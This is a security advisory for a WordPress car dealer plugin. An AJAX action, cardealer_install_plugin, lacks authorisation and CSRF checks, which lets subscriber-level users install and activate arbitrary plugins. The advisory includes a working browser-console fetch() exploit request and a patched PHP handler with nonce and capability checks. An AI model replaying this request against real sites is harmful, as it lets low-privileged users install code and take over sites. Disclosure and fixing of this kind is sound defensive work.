The plugin does not have proper authorisation and CSRF checks in an AJAX action, allowing any authenticated user, such as a subscriber, to call it and install and activate arbitrary plugins from wordpress.org.
Run the below command in the developer console of the web browser while being on the blog as a subscriber user to install and activate the classic-editor plugin:

fetch('/wp-admin/admin-ajax.php', {
  method: 'POST',
  headers: new Headers({
    'Content-Type': 'application/x-www-form-urlencoded',
  }),
  body: 'action=cardealer_install_plugin&slug=classic-editor',
  redirect: 'follow'
})
  .then(response => response.text())
  .then(result => console.log(result))
  .catch(error => console.log('error', error));
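The two missing checks described above, shown as an added example that is not the plugin's own code: a handler for the `cardealer_install_plugin` action that verifies a nonce and the caller's capabilities before anything is installed. The function name, the nonce action, the `nonce` field and the slug allowlist are assumptions.

```php
<?php
// Added example (not the plugin's code). Only the action name comes from the advisory;
// the function name, nonce action, 'nonce' field and allowlist are assumptions.
add_action( 'wp_ajax_cardealer_install_plugin', 'example_install_plugin_handler' );

function example_install_plugin_handler() {
    // CSRF: the admin page must emit wp_create_nonce( 'example_install_plugin' ) and the
    // request must return it in the 'nonce' field; an invalid or missing nonce ends the request.
    check_ajax_referer( 'example_install_plugin', 'nonce' );

    // Authorisation: subscribers hold neither capability, so they stop here.
    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Restrict the slug to the plugins this feature is meant to offer (constructed list).
    $slug    = isset( $_POST['slug'] ) ? sanitize_key( wp_unslash( $_POST['slug'] ) ) : '';
    $allowed = array( 'classic-editor' );
    if ( ! in_array( $slug, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Plugin not allowed.' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/plugin.php';

    // Resolve the package on wordpress.org, then install and activate it.
    $api = plugins_api( 'plugin_information', array( 'slug' => $slug ) );
    if ( is_wp_error( $api ) ) {
        wp_send_json_error( array( 'message' => $api->get_error_message() ), 502 );
    }

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    if ( true !== $upgrader->install( $api->download_link ) ) {
        wp_send_json_error( array( 'message' => 'Installation failed.' ), 500 );
    }

    $activated = activate_plugin( $upgrader->plugin_info() );
    if ( is_wp_error( $activated ) ) {
        wp_send_json_error( array( 'message' => $activated->get_error_message() ), 500 );
    }
    wp_send_json_success( array( 'slug' => $slug ) );
}
```

With these checks in place, the subscriber request shown above is rejected at the nonce check, and a request carrying a valid nonce from a low-privileged session is rejected with a 403 at the capability check.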
Lana Codes
Yes
2022-11-21 (about 10 months ago)